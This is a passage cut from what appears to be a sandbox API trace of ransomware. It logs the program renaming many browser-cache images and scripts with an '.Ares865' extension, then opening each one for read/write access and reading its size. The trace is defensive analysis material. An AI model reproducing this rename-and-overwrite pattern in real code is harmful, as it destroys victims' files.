(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEfwtU[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbefwtu[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.092] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1926) returned 1 [0096.094] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEfzSd[1].jpg.Ares865") returned 117 [0096.094] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEfzSd[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbefzsd[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEfzSd[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbefzsd[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.095] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEfzSd[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbefzsd[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.096] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2567) returned 1 [0096.099] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgCuQ[1].jpg.Ares865") returned 117 [0096.099] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgCuQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegcuq[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgCuQ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegcuq[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.102] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgCuQ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegcuq[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.102] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6552) returned 1 [0096.105] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgHzB[1].jpg.Ares865") returned 117 [0096.105] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgHzB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeghzb[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgHzB[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeghzb[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.106] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgHzB[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeghzb[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.107] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6757) returned 1 [0096.110] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIl2[1].jpg.Ares865") returned 117 [0096.110] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIl2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegil2[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIl2[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegil2[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.111] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIl2[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegil2[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.111] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=23109) returned 1 [0096.115] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIl2[2].jpg.Ares865") returned 117 [0096.115] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIl2[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegil2[2].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIl2[2].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegil2[2].jpg.ares865"), dwFlags=0x1) returned 1 [0096.116] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIl2[2].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegil2[2].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.116] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14479) returned 1 [0096.120] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIyL[1].jpg.Ares865") returned 117 [0096.120] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIyL[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegiyl[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIyL[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegiyl[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.121] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIyL[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegiyl[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.121] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7831) returned 1 [0096.125] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgkY6[1].jpg.Ares865") returned 117 [0096.125] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgkY6[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegky6[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgkY6[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegky6[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.126] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgkY6[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegky6[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.126] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9151) returned 1 [0096.129] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgLzV[1].jpg.Ares865") returned 117 [0096.130] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgLzV[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeglzv[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgLzV[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeglzv[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.131] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgLzV[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeglzv[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.131] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2271) returned 1 [0096.137] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgUri[1].jpg.Ares865") returned 117 [0096.137] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgUri[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeguri[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgUri[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeguri[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.139] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgUri[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeguri[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.139] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11149) returned 1 [0096.143] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgXBv[1].jpg.Ares865") returned 117 [0096.143] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgXBv[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegxbv[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgXBv[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegxbv[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.144] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgXBv[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegxbv[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.145] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8223) returned 1 [0096.148] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgZME[1].jpg.Ares865") returned 117 [0096.149] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgZME[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegzme[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgZME[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegzme[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.150] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgZME[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegzme[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.150] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1769) returned 1 [0096.156] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBghfVy[1].png.Ares865") returned 117 [0096.156] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBghfVy[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbghfvy[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBghfVy[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbghfvy[1].png.ares865"), dwFlags=0x1) returned 1 [0096.157] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBghfVy[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbghfvy[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.158] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=476) returned 1 [0096.162] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBkwUr[1].png.Ares865") returned 116 [0096.162] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBkwUr[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbkwur[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBkwUr[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbkwur[1].png.ares865"), dwFlags=0x1) returned 1 [0096.163] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBkwUr[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbkwur[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.163] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=431) returned 1 [0096.167] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBlBV0U[1].png.Ares865") returned 117 [0096.167] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBlBV0U[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bblbv0u[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBlBV0U[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bblbv0u[1].png.ares865"), dwFlags=0x1) returned 1 [0096.168] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBlBV0U[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bblbv0u[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.168] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=571) returned 1 [0096.172] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBzhWWE[1].jpg.Ares865") returned 117 [0096.172] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBzhWWE[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbzhwwe[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBzhWWE[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbzhwwe[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.173] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBzhWWE[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbzhwwe[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.173] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13174) returned 1 [0096.177] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\benefits-2[1].jpg.Ares865") returned 120 [0096.177] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\benefits-2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\benefits-2[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\benefits-2[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\benefits-2[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.178] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\benefits-2[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\benefits-2[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.178] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=80902) returned 1 [0096.188] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\benefits-4[1].jpg.Ares865") returned 120 [0096.188] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\benefits-4[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\benefits-4[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\benefits-4[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\benefits-4[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.190] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\benefits-4[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\benefits-4[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.190] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=83149) returned 1 [0096.197] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\bootstrap[1].js.Ares865") returned 118 [0096.197] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet 